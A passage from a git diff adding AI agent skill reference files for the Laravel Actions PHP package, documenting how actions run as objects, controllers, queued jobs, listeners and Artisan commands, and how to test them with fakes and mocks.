+
+    public int $jobMaxExceptions = 3;
+
+    public function getJobRetryUntil(): DateTime
+    {
+        return now()->addMinutes(30);
+    }
+
+    public function getJobBackoff(): array
+    {
+        return [60, 120];
+    }
+
+    public function getJobUniqueId(Demo $demo): string
+    {
+        return $demo->id;
+    }
+
+    public function handle(Demo $demo): void
+    {
+        // Core business logic.
+    }
+
+    public function asJob(JobDecorator $job, Demo $demo): void
+    {
+        // Queue-specific orchestration and retry behavior.
+        $this->handle($demo);
+    }
+}
+```
+
+Use these members only when needed:
+
+- `$jobTries`: max attempts for the queued execution.
+- `$jobMaxExceptions`: max unhandled exceptions before failing.
+- `getJobRetryUntil()`: absolute retry deadline.
+- `getJobBackoff()`: retry delay strategy per attempt.
+- `getJobUniqueId(...)`: deduplication key for unique jobs.
+- `asJob(JobDecorator $job, ...)`: access attempt metadata and queue-only branching.
+
+### Run as Listener
+
+- Register the action class as listener in `EventServiceProvider`.
+- Use `asListener(EventName $event)` and delegate to `handle(...)`.
+
+### Run as Command
+
+- Define `$commandSignature` and `$commandDescription` properties.
+- Implement `asCommand(Command $command)` and keep console IO in this method only.
+- Import `Command` with `use Illuminate\Console\Command;`.
+
+## Testing Guidance
+
+Use a two-layer strategy:
+
+1. `handle(...)` tests for business correctness.
+2. entrypoint tests (`asController`, `asJob`, `asListener`, `asCommand`) for wiring/orchestration.
+
+### Deep Dive: `AsFake` methods (2.x)
+
+Reference: https://www.laravelactions.com/2.x/as-fake.html
+
+Use these methods intentionally based on what you want to prove.
+
+#### `mock()`
+
+- Replaces the action with a full mock.
+- Best when you need strict expectations and argument assertions.
+
+```php
+PublishArticle::mock()
+    ->shouldReceive('handle')
+    ->once()
+    ->with(42)
+    ->andReturnTrue();
+```
+
+#### `partialMock()`
+
+- Replaces the action with a partial mock.
+- Best when you want to keep most real behavior but stub one expensive/internal method.
+
+```php
+PublishArticle::partialMock()
+    ->shouldReceive('fetchRemoteData')
+    ->once()
+    ->andReturn(['ok' => true]);
+```
+
+#### `spy()`
+
+- Replaces the action with a spy.
+- Best for post-execution verification ("was called with X") without predefining all expectations.
+
+```php
+$spy = PublishArticle::spy()->allows('handle')->andReturnTrue();
+
+// execute code that triggers the action...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+#### `shouldRun()`
+
+- Shortcut for `mock()->shouldReceive('handle')`.
+- Best for compact orchestration assertions.
+
+```php
+PublishArticle::shouldRun()->once()->with(42)->andReturnTrue();
+```
+
+#### `shouldNotRun()`
+
+- Shortcut for `mock()->shouldNotReceive('handle')`.
+- Best for guard-clause tests and branch coverage.
+
+```php
+PublishArticle::shouldNotRun();
+```
+
+#### `allowToRun()`
+
+- Shortcut for spy + allowing `handle`.
+- Best when you want execution to proceed but still assert interaction.
+
+```php
+$spy = PublishArticle::allowToRun()->andReturnTrue();
+// ...
+$spy->shouldHaveReceived('handle')->once();
+```
+
+#### `isFake()` and `clearFake()`
+
+- `isFake()` checks whether the class is currently swapped.
+- `clearFake()` resets the fake and prevents cross-test leakage.
+
+```php
+expect(PublishArticle::isFake())->toBeFalse();
+PublishArticle::mock();
+expect(PublishArticle::isFake())->toBeTrue();
+PublishArticle::clearFake();
+expect(PublishArticle::isFake())->toBeFalse();
+```
+
+### Recommended test matrix for Actions
+
+- Business rule test: call `handle(...)` directly with real dependencies/factories.
+- HTTP wiring test: hit route/controller, fake downstream actions with `shouldRun` or `shouldNotRun`.
+- Job wiring test: dispatch action as job, assert expected downstream action calls.
+- Event listener test: dispatch event, assert action interaction via fake/spy.
+- Console test: run artisan command, assert action invocation and output.
+
+### Practical defaults
+
+- Prefer `shouldRun()` and `shouldNotRun()` for readability in branch tests.
+- Prefer `spy()`/`allowToRun()` when behavior is mostly real and you only need call verification.
+- Prefer `mock()` when interaction contracts are strict and should fail fast.
+- Use `clearFake()` in cleanup when a fake might leak into another test.
+- Keep side effects isolated: fake only the action under test boundary, not everything.
+
+### Pest style examples
+
+```php
+it('dispatches the downstream action', function () {
+    SendInvoiceEmail::shouldRun()->once()->withArgs(fn (int $invoiceId) => $invoiceId > 0);
+
+    FinalizeInvoice::run(123);
+});
+
+it('does not dispatch when invoice is already sent', function () {
+    SendInvoiceEmail::shouldNotRun();
+
+    FinalizeInvoice::run(123, alreadySent: true);
+});
+```
+
+Run the minimum relevant suite first, e.g. `php artisan test --compact --filter=PublishArticle` or by specific test file.
+
+## Troubleshooting Checklist
+
+- Ensure the class uses `AsAction` and namespace matches autoload.
+- Check route registration when used as controller.
+- Check queue config when using `dispatch`.
+- Verify event-to-listener mapping in `EventServiceProvider`.
+- Keep transport concerns in adapter methods (`asController`, `asCommand`, etc.), not in `handle(...)`.
+
+## Common Pitfalls
+
+- Putting HTTP response/redirect logic inside `handle(...)` instead of `asController(...)`.
+- Duplicating business rules across `as*` methods rather than delegating to `handle(...)`.
+- Assuming listener wiring works without explicit registration where required.
+- Testing only entrypoints and skipping direct `handle(...)` behavior tests.
+- Overusing Actions for one-off, single-context logic with no reuse pressure.
+
+## Topic References
+
+Use these references for deep dives by entrypoint/topic. Keep `SKILL.md` focused on workflow and decision rules.
+
+- Object entrypoint: `references/object.md`
+- Controller entrypoint: `references/controller.md`
+- Job entrypoint: `references/job.md`
+- Listener entrypoint: `references/listener.md`
+- Command entrypoint: `references/command.md`
+- With attributes: `references/with-attributes.md`
+- Testing and fakes: `references/testing-fakes.md`
+- Troubleshooting: `references/troubleshooting.md`
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/command.md b/.agents/skills/laravel-actions/references/command.md
new file mode 100644
index 000000000..a7b255daf
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/command.md
@@ -0,0 +1,160 @@
+# Command Entrypoint (`asCommand`)
+
+## Scope
+
+Use this reference when exposing actions as Artisan commands.
+
+## Recap
+
+- Documents command execution via `asCommand(...)` and fallback to `handle(...)`.
+- Covers command metadata via methods/properties (signature, description, help, hidden).
+- Includes registration example and focused artisan test pattern.
+- Reinforces separation between console I/O and domain logic.
+
+## Recommended pattern
+
+- Define `$commandSignature` and `$commandDescription`.
+- Implement `asCommand(Command $command)` for console I/O.
+- Keep business logic in `handle(...)`.
+
+## Methods used (`CommandDecorator`)
+
+### `asCommand`
+
+Called when executed as a command. If missing, it falls back to `handle(...)`.
+
+```php
+use Illuminate\Console\Command;
+
+class UpdateUserRole
+{
+    use AsAction;
+
+    public string $commandSignature = 'users:update-role {user_id} {role}';
+
+    public function handle(User $user, string $newRole): void
+    {
+        $user->update(['role' => $newRole]);
+    }
+
+    public function asCommand(Command $command): void
+    {
+        $this->handle(
+            User::findOrFail($command->argument('user_id')),
+            $command->argument('role')
+        );
+
+        $command->info('Done!');
+    }
+}
+```
+
+### `getCommandSignature`
+
+Defines the command signature. Required when registering an action as a command if no `$commandSignature` property is set.
+
+```php
+public function getCommandSignature(): string
+{
+    return 'users:update-role {user_id} {role}';
+}
+```
+
+### `$commandSignature`
+
+Property alternative to `getCommandSignature`.
+
+```php
+public string $commandSignature = 'users:update-role {user_id} {role}';
+```
+
+### `getCommandDescription`
+
+Provides command description.
+
+```php
+public function getCommandDescription(): string
+{
+    return 'Updates the role of a given user.';
+}
+```
+
+### `$commandDescription`
+
+Property alternative to `getCommandDescription`.
+
+```php
+public string $commandDescription = 'Updates the role of a given user.';
+```
+
+### `getCommandHelp`
+
+Provides additional help text shown with `--help`.
+
+```php
+public function getCommandHelp(): string
+{
+    return 'My help message.';
+}
+```
+
+### `$commandHelp`
+
+Property alternative to `getCommandHelp`.
+
+```php
+public string $commandHelp = 'My help message.';
+```
+
+### `isCommandHidden`
+
+Defines whether command should be hidden from artisan list. Default is `false`.
+
+```php
+public function isCommandHidden(): bool
+{
+    return true;
+}
+```
+
+### `$commandHidden`
+
+Property alternative to `isCommandHidden`.
+
+```php
+public bool $commandHidden = true;
+```
+
+## Examples
+
+### Register in console kernel
+
+```php
+// app/Console/Kernel.php
+protected $commands = [
+    UpdateUserRole::class,
+];
+```
+
+### Focused command test
+
+```php
+$this->artisan('users:update-role 1 admin')
+    ->expectsOutput('Done!')
+    ->assertSuccessful();
+```
+
+## Checklist
+
+- `use Illuminate\Console\Command;` is imported.
+- Signature/options/arguments are documented.
+- Command test verifies invocation and output.
+
+## Common pitfalls
+
+- Mixing command I/O with domain logic in `handle(...)`.
+- Missing/ambiguous command signature.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-command.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/controller.md b/.agents/skills/laravel-actions/references/controller.md
new file mode 100644
index 000000000..d48c34df8
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/controller.md
@@ -0,0 +1,339 @@
+# Controller Entrypoint (`asController`)
+
+## Scope
+
+Use this reference when exposing an action through HTTP routes.
+
+## Recap
+
+- Documents controller lifecycle around `asController(...)` and response adapters.
+- Covers routing patterns, middleware, and optional in-action `routes()` registration.
+- Summarizes validation/authorization hooks used by `ActionRequest`.
+- Provides extension points for JSON/HTML responses and failure customization.
+
+## Recommended pattern
+
+- Route directly to action class when appropriate.
+- Keep HTTP adaptation in controller methods (`asController`, `jsonResponse`, `htmlResponse`).
+- Keep domain logic in `handle(...)`.
+
+## Methods provided (`AsController` trait)
+
+### `__invoke`
+
+Required so Laravel can register the action class as an invokable controller.
+
+```php
+$action($someArguments);
+
+// Equivalent to:
+$action->handle($someArguments);
+```
+
+If the method does not exist, Laravel route registration fails for invokable controllers.
+
+```php
+// Illuminate\Routing\RouteAction
+protected static function makeInvokable($action)
+{
+    if (! method_exists($action, '__invoke')) {
+        throw new UnexpectedValueException("Invalid route action: [{$action}].");
+    }
+
+    return $action.'@__invoke';
+}
+```
+
+If you need your own `__invoke`, alias the trait implementation:
+
+```php
+class MyAction
+{
+    use AsAction {
+        __invoke as protected invokeFromLaravelActions;
+    }
+
+    public function __invoke()
+    {
+        // Custom behavior...
+    }
+}
+```
+
+## Methods used (`ControllerDecorator` + `ActionRequest`)
+
+### `asController`
+
+Called when used as invokable controller. If missing, it falls back to `handle(...)`.
+
+```php
+public function asController(User $user, Request $request): Response
+{
+    $article = $this->handle(
+        $user,
+        $request->get('title'),
+        $request->get('body')
+    );
+
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `jsonResponse`
+
+Called after `asController` when request expects JSON.
+
+```php
+public function jsonResponse(Article $article, Request $request): ArticleResource
+{
+    return new ArticleResource($article);
+}
+```
+
+### `htmlResponse`
+
+Called after `asController` when request expects HTML.
+
+```php
+public function htmlResponse(Article $article, Request $request): Response
+{
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `getControllerMiddleware`
+
+Adds middleware directly on the action controller.
+
+```php
+public function getControllerMiddleware(): array
+{
+    return ['auth', MyCustomMiddleware::class];
+}
+```
+
+### `routes`
+
+Defines routes directly in the action.
+
+```php
+public static function routes(Router $router)
+{
+    $router->get('author/{author}/articles', static::class);
+}
+```
+
+To enable this, register routes from actions in a service provider:
+
+```php
+use Lorisleiva\Actions\Facades\Actions;
+
+Actions::registerRoutes();
+Actions::registerRoutes('app/MyCustomActionsFolder');
+Actions::registerRoutes([
+    'app/Authentication',
+    'app/Billing',
+    'app/TeamManagement',
+]);
+```
+
+### `prepareForValidation`
+
+Called before authorization and validation are resolved.
+
+```php
+public function prepareForValidation(ActionRequest $request): void
+{
+    $request->merge(['some' => 'additional data']);
+}
+```
+
+### `authorize`
+
+Defines authorization logic.
+
+```php
+public function authorize(ActionRequest $request): bool
+{
+    return $request->user()->role === 'author';
+}
+```
+
+You can also return gate responses:
+
+```php
+use Illuminate\Auth\Access\Response;
+
+public function authorize(ActionRequest $request): Response
+{
+    if ($request->user()->role !== 'author') {
+        return Response::deny('You must be an author to create a new article.');
+    }
+
+    return Response::allow();
+}
+```
+
+### `rules`
+
+Defines validation rules.
+
+```php
+public function rules(): array
+{
+    return [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ];
+}
+```
+
+### `withValidator`
+
+Adds custom validation logic with an after hook.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function withValidator(Validator $validator, ActionRequest $request): void
+{
+    $validator->after(function (Validator $validator) use ($request) {
+        if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+            $validator->errors()->add('current_password', 'Wrong password.');
+        }
+    });
+}
+```
+
+### `afterValidator`
+
+Alternative to add post-validation checks.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function afterValidator(Validator $validator, ActionRequest $request): void
+{
+    if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+        $validator->errors()->add('current_password', 'Wrong password.');
+    }
+}
+```
+
+### `getValidator`
+
+Provides a custom validator instead of default rules pipeline.
+
+```php
+use Illuminate\Validation\Factory;
+use Illuminate\Validation\Validator;
+
+public function getValidator(Factory $factory, ActionRequest $request): Validator
+{
+    return $factory->make($request->only('title', 'body'), [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ]);
+}
+```
+
+### `getValidationData`
+
+Defines which data is validated (default: `$request->all()`).
+
+```php
+public function getValidationData(ActionRequest $request): array
+{
+    return $request->all();
+}
+```
+
+### `getValidationMessages`
+
+Custom validation error messages.
+
+```php
+public function getValidationMessages(): array
+{
+    return [
+        'title.required' => 'Looks like you forgot the title.',
+        'body.required' => 'Is that really all you have to say?',
+    ];
+}
+```
+
+### `getValidationAttributes`
+
+Human-friendly names for request attributes.
+
+```php
+public function getValidationAttributes(): array
+{
+    return [
+        'title' => 'headline',
+        'body' => 'content',
+    ];
+}
+```
+
+### `getValidationRedirect`
+
+Custom redirect URL on validation failure.
+
+```php
+public function getValidationRedirect(UrlGenerator $url): string
+{
+    return $url->to('/my-custom-redirect-url');
+}
+```
+
+### `getValidationErrorBag`
+
+Custom error bag name on validation failure (default: `default`).
+
+```php
+public function getValidationErrorBag(): string
+{
+    return 'my_custom_error_bag';
+}
+```
+
+### `getValidationFailure`
+
+Override validation failure behavior.
+
+```php
+public function getValidationFailure(): void
+{
+    throw new MyCustomValidationException();
+}
+```
+
+### `getAuthorizationFailure`
+
+Override authorization failure behavior.
+
+```php
+public function getAuthorizationFailure(): void
+{
+    throw new MyCustomAuthorizationException();
+}
+```
+
+## Checklist
+
+- Route wiring points to the action class.
+- `asController(...)` delegates to `handle(...)`.
+- Validation/authorization methods are explicit where needed.
+- Response mapping is split by channel (`jsonResponse`, `htmlResponse`) when useful.
+- HTTP tests cover both success and validation/authorization failure branches.
+
+## Common pitfalls
+
+- Putting response/redirect logic in `handle(...)`.
+- Duplicating business rules in `asController(...)` instead of delegating.
+- Assuming action route discovery works without `Actions::registerRoutes(...)` when using in-action `routes()`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-controller.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/job.md b/.agents/skills/laravel-actions/references/job.md
new file mode 100644
index 000000000..b4c7cbea0
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/job.md
@@ -0,0 +1,425 @@
+# Job Entrypoint (`dispatch`, `asJob`)
+
+## Scope
+
+Use this reference when running an action through queues.
+
+## Recap
+
+- Lists async/sync dispatch helpers and conditional dispatch variants.
+- Covers job wrapping/chaining with `makeJob`, `makeUniqueJob`, and `withChain`.
+- Documents queue assertion helpers for tests (`assertPushed*`).
+- Summarizes `JobDecorator` hooks/properties for retries, uniqueness, timeout, and failure handling.
+
+## Recommended pattern
+
+- Dispatch with `Action::dispatch(...)` for async execution.
+- Keep queue-specific orchestration in `asJob(...)`.
+- Keep reusable business logic in `handle(...)`.
+
+## Methods provided (`AsJob` trait)
+
+### `dispatch`
+
+Dispatches the action asynchronously.
+
+```php
+SendTeamReportEmail::dispatch($team);
+```
+
+### `dispatchIf`
+
+Dispatches asynchronously only if condition is met.
+
+```php
+SendTeamReportEmail::dispatchIf($team->plan === 'premium', $team);
+```
+
+### `dispatchUnless`
+
+Dispatches asynchronously unless condition is met.
+
+```php
+SendTeamReportEmail::dispatchUnless($team->plan === 'free', $team);
+```
+
+### `dispatchSync`
+
+Dispatches synchronously.
+
+```php
+SendTeamReportEmail::dispatchSync($team);
+```
+
+### `dispatchNow`
+
+Alias of `dispatchSync`.
+
+```php
+SendTeamReportEmail::dispatchNow($team);
+```
+
+### `dispatchAfterResponse`
+
+Dispatches synchronously after the HTTP response is sent.
+
+```php
+SendTeamReportEmail::dispatchAfterResponse($team);
+```
+
+### `makeJob`
+
+Creates a `JobDecorator` wrapper. Useful with `dispatch(...)` helper or chains.
+
+```php
+dispatch(SendTeamReportEmail::makeJob($team));
+```
+
+### `makeUniqueJob`
+
+Creates a `UniqueJobDecorator` wrapper. Usually automatic with `ShouldBeUnique`, but can be forced.
+
+```php
+dispatch(SendTeamReportEmail::makeUniqueJob($team));
+```
+
+### `withChain`
+
+Attaches jobs to run after successful processing.
+
+```php
+$chain = [
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+];
+
+CreateNewTeamReport::withChain($chain)->dispatch($team);
+```
+
+Equivalent using `Bus::chain(...)`:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::chain([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+])->dispatch();
+```
+
+Chain assertion example:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::fake();
+
+Bus::assertChained([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+]);
+```
+
+### `assertPushed`
+
+Asserts the action was queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushed();
+SendTeamReportEmail::assertPushed(3);
+SendTeamReportEmail::assertPushed($callback);
+SendTeamReportEmail::assertPushed(3, $callback);
+```
+
+`$callback` receives:
+- Action instance.
+- Dispatched arguments.
+- `JobDecorator` instance.
+- Queue name.
+
+### `assertNotPushed`
+
+Asserts the action was not queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertNotPushed();
+SendTeamReportEmail::assertNotPushed($callback);
+```
+
+### `assertPushedOn`
+
+Asserts the action was queued on a specific queue.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushedOn('reports');
+SendTeamReportEmail::assertPushedOn('reports', 3);
+SendTeamReportEmail::assertPushedOn('reports', $callback);
+SendTeamReportEmail::assertPushedOn('reports', 3, $callback);
+```
+
+## Methods used (`JobDecorator`)
+
+### `asJob`
+
+Called when dispatched as a job. Falls back to `handle(...)` if missing.
+
+```php
+class SendTeamReportEmail
+{
+    use AsAction;
+
+    public function handle(Team $team, bool $fullReport = false): void
+    {
+        // Prepare report and send it to all $team->users.
+    }
+
+    public function asJob(Team $team): void
+    {
+        $this->handle($team, true);
+    }
+}
+```
+
+### `getJobMiddleware`
+
+Adds middleware to the queued action.
+
+```php
+public function getJobMiddleware(array $parameters): array
+{
+    return [new RateLimited('reports')];
+}
+```
+
+### `configureJob`
+
+Configures `JobDecorator` options.
+
+```php
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+public function configureJob(JobDecorator $job): void
+{
+    $job->onConnection('my_connection')
+        ->onQueue('my_queue')
+        ->through(['my_middleware'])
+        ->chain(['my_chain'])
+        ->delay(60);
+}
+```
+
+### `$jobConnection`
+
+Defines queue connection.
+
+```php
+public string $jobConnection = 'my_connection';
+```
+
+### `$jobQueue`
+
+Defines queue name.
+
+```php
+public string $jobQueue = 'my_queue';
+```
+
+### `$jobTries`
+
+Defines max attempts.
+
+```php
+public int $jobTries = 10;
+```
+
+### `$jobMaxExceptions`
+
+Defines max unhandled exceptions before failure.
+
+```php
+public int $jobMaxExceptions = 3;
+```
+
+### `$jobBackoff`
+
+Defines retry delay seconds.
+
+```php
+public int $jobBackoff = 60;
+```
+
+### `getJobBackoff`
+
+Defines retry delay (int or per-attempt array).
+
+```php
+public function getJobBackoff(): int
+{
+    return 60;
+}
+
+public function getJobBackoff(): array
+{
+    return [30, 60, 120];
+}
+```
+
+### `$jobTimeout`
+
+Defines timeout in seconds.
+
+```php
+public int $jobTimeout = 60 * 30;
+```
+
+### `$jobRetryUntil`
+
+Defines timestamp retry deadline.
+
+```php
+public int $jobRetryUntil = 1610191764;
+```
+
+### `getJobRetryUntil`
+
+Defines retry deadline as `DateTime`.
+
+```php
+public function getJobRetryUntil(): DateTime
+{
+    return now()->addMinutes(30);
+}
+```
+
+### `getJobDisplayName`
+
+Customizes queued job display name.
+
+```php
+public function getJobDisplayName(): string
+{
+    return 'Send team report email';
+}
+```
+
+### `getJobTags`
+
+Adds queue tags.
+
+```php
+public function getJobTags(Team $team): array
+{
+    return ['report', 'team:'.$team->id];
+}
+```
+
+### `getJobUniqueId`
+
+Defines uniqueness key when using `ShouldBeUnique`.
+
+```php
+public function getJobUniqueId(Team $team): int
+{
+    return $team->id;
+}
+```
+
+### `$jobUniqueId`
+
+Static uniqueness key alternative.
+
+```php
+public string $jobUniqueId = 'some_static_key';
+```
+
+### `getJobUniqueFor`
+
+Defines uniqueness lock duration in seconds.
+
+```php
+public function getJobUniqueFor(Team $team): int
+{
+    return $team->role === 'premium' ? 1800 : 3600;
+}
+```
+
+### `$jobUniqueFor`
+
+Property alternative for uniqueness lock duration.
+
+```php
+public int $jobUniqueFor = 3600;
+```
+
+### `getJobUniqueVia`
+
+Defines cache driver used for uniqueness lock.
+
+```php
+public function getJobUniqueVia()
+{
+    return Cache::driver('redis');
+}
+```
+
+### `$jobDeleteWhenMissingModels`
+
+Property alternative for missing model handling.
+
+```php
+public bool $jobDeleteWhenMissingModels = true;
+```
+
+### `getJobDeleteWhenMissingModels`
+
+Defines whether jobs with missing models are deleted.
+
+```php
+public function getJobDeleteWhenMissingModels(): bool
+{
+    return true;
+}
+```
+
+### `jobFailed`
+
+Handles job failure. Receives exception and dispatched parameters.
+
+```php
+public function jobFailed(?Throwable $e, ...$parameters): void
+{
+    // Notify users, report errors, trigger compensations...
+}
+```
+
+## Checklist
+
+- Async/sync dispatch method matches use-case (`dispatch`, `dispatchSync`, `dispatchAfterResponse`).
+- Queue config is explicit when needed (`$jobConnection`, `$jobQueue`, `configureJob`).
+- Retry/backoff/timeout policies are intentional.
+- `asJob(...)` delegates to `handle(...)` unless queue-specific branching is required.
+- Queue tests use `Queue::fake()` and action assertions (`assertPushed*`).
+
+## Common pitfalls
+
+- Embedding domain logic only in `asJob(...)`.
+- Forgetting uniqueness/timeout/retry controls on heavy jobs.
+- Missing queue-specific assertions in tests.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-job.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/listener.md b/.agents/skills/laravel-actions/references/listener.md
new file mode 100644
index 000000000..c5233001d
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/listener.md
@@ -0,0 +1,81 @@
+# Listener Entrypoint (`asListener`)
+
+## Scope
+
+Use this reference when wiring actions to domain/application events.
+
+## Recap
+
+- Shows how listener execution maps event payloads into `handle(...)` arguments.
+- Describes `asListener(...)` fallback behavior and adaptation role.
+- Includes event registration example for provider wiring.
+- Emphasizes test focus on dispatch and action interaction.
+
+## Recommended pattern
+
+- Register action listener in `EventServiceProvider` (or project equivalent).
+- Use `asListener(Event $event)` for event adaptation.
+- Delegate core logic to `handle(...)`.
+
+## Methods used (`ListenerDecorator`)
+
+### `asListener`
+
+Called when executed as an event listener. If missing, it falls back to `handle(...)`.
+
+```php
+class SendOfferToNearbyDrivers
+{
+    use AsAction;
+
+    public function handle(Address $source, Address $destination): void
+    {
+        // ...
+    }
+
+    public function asListener(TaxiRequested $event): void
+    {
+        $this->handle($event->source, $event->destination);
+    }
+}
+```
+
+## Examples
+
+### Event registration
+
+```php
+// app/Providers/EventServiceProvider.php
+protected $listen = [
+    TaxiRequested::class => [
+        SendOfferToNearbyDrivers::class,
+    ],
+];
+```
+
+### Focused listener test
+
+```php
+use Illuminate\Support\Facades\Event;
+
+Event::fake();
+
+TaxiRequested::dispatch($source, $destination);
+
+Event::assertDispatched(TaxiRequested::class);
+```
+
+## Checklist
+
+- Event-to-listener mapping is registered.
+- Listener method signature matches event contract.
+- Listener tests verify dispatch and action interaction.
+
+## Common pitfalls
+
+- Assuming automatic listener registration when explicit mapping is required.
+- Re-implementing business logic in `asListener(...)`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-listener.html
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/object.md b/.agents/skills/laravel-actions/references/object.md
new file mode 100644
index 000000000..6a90be4d5
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/object.md
@@ -0,0 +1,118 @@
+# Object Entrypoint (`run`, `make`, DI)
+
+## Scope
+
+Use this reference when the action is invoked as a plain object.
+
+## Recap
+
+- Explains object-style invocation with `make`, `run`, `runIf`, `runUnless`.
+- Clarifies when to use static helpers versus DI/manual invocation.
+- Includes minimal examples for direct run and service-level injection.
+- Highlights boundaries: business logic stays in `handle(...)`.
+
+## Recommended pattern
+
+- Keep core business logic in `handle(...)`.
+- Prefer `Action::run(...)` for readability.
+- Use `Action::make()->handle(...)` or DI only when needed.
+
+## Methods provided
+
+### `make`
+
+Resolves the action from the container.
+
+```php
+PublishArticle::make();
+
+// Equivalent to:
+app(PublishArticle::class);
+```
+
+### `run`
+
+Resolves and executes the action.
+
+```php
+PublishArticle::run($articleId);
+
+// Equivalent to:
+PublishArticle::make()->handle($articleId);
+```
+
+### `runIf`
+
+Resolves and executes the action only if the condition is met.
+
+```php
+PublishArticle::runIf($shouldPublish, $articleId);
+
+// Equivalent mental model:
+if ($shouldPublish) {
+    PublishArticle::run($articleId);
+}
+```
+
+### `runUnless`
+
+Resolves and executes the action only if the condition is not met.
+
+```php
+PublishArticle::runUnless($alreadyPublished, $articleId);
+
+// Equivalent mental model:
+if (! $alreadyPublished) {
+    PublishArticle::run($articleId);
+}
+```
+
+## Checklist
+
+- Input/output types are explicit.
+- `handle(...)` has no transport concerns.
+- Business behavior is covered by direct `handle(...)` tests.
+
+## Common pitfalls
+
+- Putting HTTP/CLI/queue concerns in `handle(...)`.
+- Calling adapters from `handle(...)` instead of the reverse.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-object.html
+
+## Examples
+
+### Minimal object-style invocation
+
+```php
+final class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        // Domain logic...
+        return true;
+    }
+}
+
+$published = PublishArticle::run(42);
+```
+
+### Dependency injection invocation
+
+```php
+final class ArticleService
+{
+    public function __construct(
+        private PublishArticle $publishArticle
+    ) {}
+
+    public function publish(int $articleId): bool
+    {
+        return $this->publishArticle->handle($articleId);
+    }
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/references/testing-fakes.md b/.agents/skills/laravel-actions/references/testing-fakes.md
new file mode 100644
index 000000000..97766e6ce
--- /dev/null
+++ b/.agents/skills/laravel-actions/references/testing-fakes.md
@@ -0,0 +1,160 @@
+# Testing and Action Fakes
+
+## Scope
+
+Use this reference when isolating action orchestration in tests.
+
+## Recap
+
+- Summarizes all `AsFake` helpers (`mock`, `partialMock`, `spy`, `shouldRun`, `shouldNotRun`, `allowToRun`).
+- Clarifies when to assert execution versus non-execution.
+- Covers fake lifecycle checks/reset (`isFake`, `clearFake`).
+- Provides branch-oriented test examples for orchestration confidence.
+
+## Core methods
+
+- `mock()`
+- `partialMock()`
+- `spy()`
+- `shouldRun()`
+- `shouldNotRun()`
+- `allowToRun()`
+- `isFake()`
+- `clearFake()`
+
+## Recommended pattern
+
+- Test `handle(...)` directly for business rules.
+- Test entrypoints for wiring/orchestration.
+- Fake only at the boundary under test.
+
+## Methods provided (`AsFake` trait)
+
+### `mock`
+
+Swaps the action with a full mock.
+
+```php
+FetchContactsFromGoogle::mock()
+    ->shouldReceive('handle')
+    ->with(42)
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `partialMock`
+
+Swaps the action with a partial mock.
+
+```php
+FetchContactsFromGoogle::partialMock()
+    ->shouldReceive('fetch')
+    ->with('some_google_identifier')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `spy`
+
+Swaps the action with a spy.
+
+```php
+$spy = FetchContactsFromGoogle::spy()
+    ->allows('handle')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `shouldRun`
+
+Helper adding expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldReceive('handle');
+```
+
+### `shouldNotRun`
+
+Helper adding negative expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldNotRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldNotReceive('handle');
+```
+
+### `allowToRun`
+
+Helper allowing `handle` on a spy.
+
+```php
+$spy = FetchContactsFromGoogle::allowToRun()
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `isFake`
+
+Returns whether the action has been swapped with a fake.
+
+```php
+FetchContactsFromGoogle::isFake(); // false
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+```
+
+### `clearFake`
+
+Clears the fake instance, if any.
+
+```php
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+FetchContactsFromGoogle::clearFake();
+FetchContactsFromGoogle::isFake(); // false
+```
+
+## Examples
+
+### Orchestration test
+
+```php
+it('runs sync contacts for premium teams', function () {
